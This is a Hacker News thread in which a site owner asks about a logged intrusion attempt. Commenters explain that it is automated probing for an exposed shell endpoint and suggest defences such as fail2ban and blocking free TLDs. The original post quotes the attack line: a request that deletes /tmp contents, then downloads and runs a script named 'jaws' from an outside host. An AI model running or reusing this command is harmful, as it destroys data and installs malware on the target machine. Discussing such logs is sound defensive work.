
Ask HN: An Attempted Hack from 112.168.59.114 - 191101
Trundling through the production logs, I found this which looks like an attempted hack from WELOVEURLHAUSBOT.zerohoes.tk. I&#x27;m not sure what the jaws file does but anything called &#x27;jaws&#x27; is probably not benign. I highly appreciate any advice on how to strengthen security in light of this.<p>Started GET &quot;&#x2F;shell?cd+&#x2F;tmp;rm+-rf+*;wget+http:&#x2F;&#x2F;WELOVEURLHAUSBOT.zerohoes.tk&#x2F;jaws;sh+&#x2F;tmp&#x2F;jaws&quot;
======
Nextgrid
It's just the Internet's "background noise", lots of compromised machines try
to attack others. Any well-designed application will be immune to this.

This particular attempt isn't cutting-edge and isn't trying to exploit some
obscure vulnerability. They're not even "exploiting" anything, they are
literally probing for an endpoint that is designed to happily execute any
shell command passed to it (because I guess someone somewhere was stupid
enough to implement something like this?). This is the digital equivalent of
"asking nicely".

They're trying to download a malicious shell script to the /tmp folder (that
will in turn download more malware, most likely a cryptocurrency miner) and
run it. Looking at the script (which is still available as of now) it does
many attempts to download different variations of a malicious executable, each
compiled for a different architecture. The list of architectures is quite
broad (PPC and M68K even) so on that front they've done their job very
thoroughly to maximize the potential yield.

~~~
191101
This was very helpful thank you. I found it odd that the attack was so
'blunt', for lack of a better word, and thought I may be missing something.

------
jaclaz
>but anything called 'jaws' is probably not benign

Not always, only for the record, JAWS is actually the name of a common program
to read the screen for people visually impaired:

[https://www.freedomscientific.com/products/software/jaws/](https://www.freedomscientific.com/products/software/jaws/)

Of course this has nothing to do with your case.

------
jamieweb
The tk, gq, cf, ml and ga TLDs offer free registration, so they're widely used
in scams and fraud.

In most cases you can safely block all traffic to/from them, as well as email
addresses using them.

------
obverse
Do you have a route for '/shell' ?

~~~
191101
I don't but per the previous reply, I imagine this would've been quite bad =))
I can't really think of why someone would create an API that exposes a shell
to anyone asking.

~~~
bjourne
The script is probably probing for already compromised machines.

------
sarcasmatwork
fail2ban

